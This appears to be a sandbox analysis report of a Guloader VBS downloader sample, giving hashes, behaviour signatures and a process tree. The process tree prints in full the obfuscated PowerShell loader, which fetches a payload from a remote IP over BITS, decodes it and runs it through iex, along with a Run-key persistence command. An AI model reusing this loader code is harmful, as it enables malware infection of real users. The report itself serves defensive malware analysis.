Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
12/04/2023, 03:42
Static task
static1
Behavioral task
behavioral1
Sample
a75c770acab8755ebc617f8925eff3b4.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
a75c770acab8755ebc617f8925eff3b4.vbs
Resource
win10v2004-20230220-en
General
-
Target
a75c770acab8755ebc617f8925eff3b4.vbs
-
Size
34KB
-
MD5
a75c770acab8755ebc617f8925eff3b4
-
SHA1
3368ba6a1379d325bd9f0ccfe207f4963217b9c9
-
SHA256
926fe7f70c86b5c16a632344191820206772f8c53ac075446b138d209a1bf22a
-
SHA512
2f98c7848fcb81dc39772bc3129be29c3f22ebce2cca03da3150e9f75e2f9fd472ef4301782f91c23f65a9d6f93957e653862f723b5f99293f609430caa715a6
-
SSDEEP
768:UObC4BcJLusxj/gqJ77UkZb3d8IbXK4HkMsFkafl:J24B2usBveebNzb6kul
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2000 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\Amidoplast = "%TORO% -w 1 $Inde=(Get-ItemProperty -Path 'HKCU:\\bandernes\\').Semipas;%TORO% ($Inde)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1276 ieinstal.exe 1276 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1956 powershell.exe 1276 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1956 set thread context of 1276 1956 powershell.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1256 powershell.exe 1956 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1276 ieinstal.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2000 wrote to memory of 1256 2000 WScript.exe 26 PID 2000 wrote to memory of 1256 2000 WScript.exe 26 PID 2000 wrote to memory of 1256 2000 WScript.exe 26 PID 1256 wrote to memory of 1956 1256 powershell.exe 29 PID 1256 wrote to memory of 1956 1256 powershell.exe 29 PID 1256 wrote to memory of 1956 1256 powershell.exe 29 PID 1256 wrote to memory of 1956 1256 powershell.exe 29 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30 PID 1956 wrote to memory of 1276 1956 powershell.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a75c770acab8755ebc617f8925eff3b4.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1276
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5069fd8079d43d20598bfe6ae99b1c26c
SHA1e19a61ddcc7ca18e370a2c8be031fc0cf9c6b65a
SHA25609cabd6d9987064a893ad16157eb084057b0d56eed7a3dd1e159b248651f548e
SHA512ec055e0db715bb1e2113d5dff5eb9ce85a869bfab9fc6b20646aa7b1d650fe40181f1fd0101b0a74d3318f48e9dfd4ad27d69a22313201f6e492478d7ebba527
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JI3GVPU0JGAJ3VIK6VTL.temp
Filesize7KB
MD51ccdea49ee7f63b92273d2b15ea05d2c
SHA127407ae33b2230f9902989f4bdd7c1b3dcc0033d
SHA256de0f011ce6e3bc39e0f4198747f50cb34c37d572881b14dd4372ba64cd68ac90
SHA512cd2cb7732a4eb3ba3816665a25c205f50bb1552ac98be645e18aae4e53812e351aee25edb779be22479eb7e4bf7f3529e6ef1bf07d36fe723b01624ccda6abfb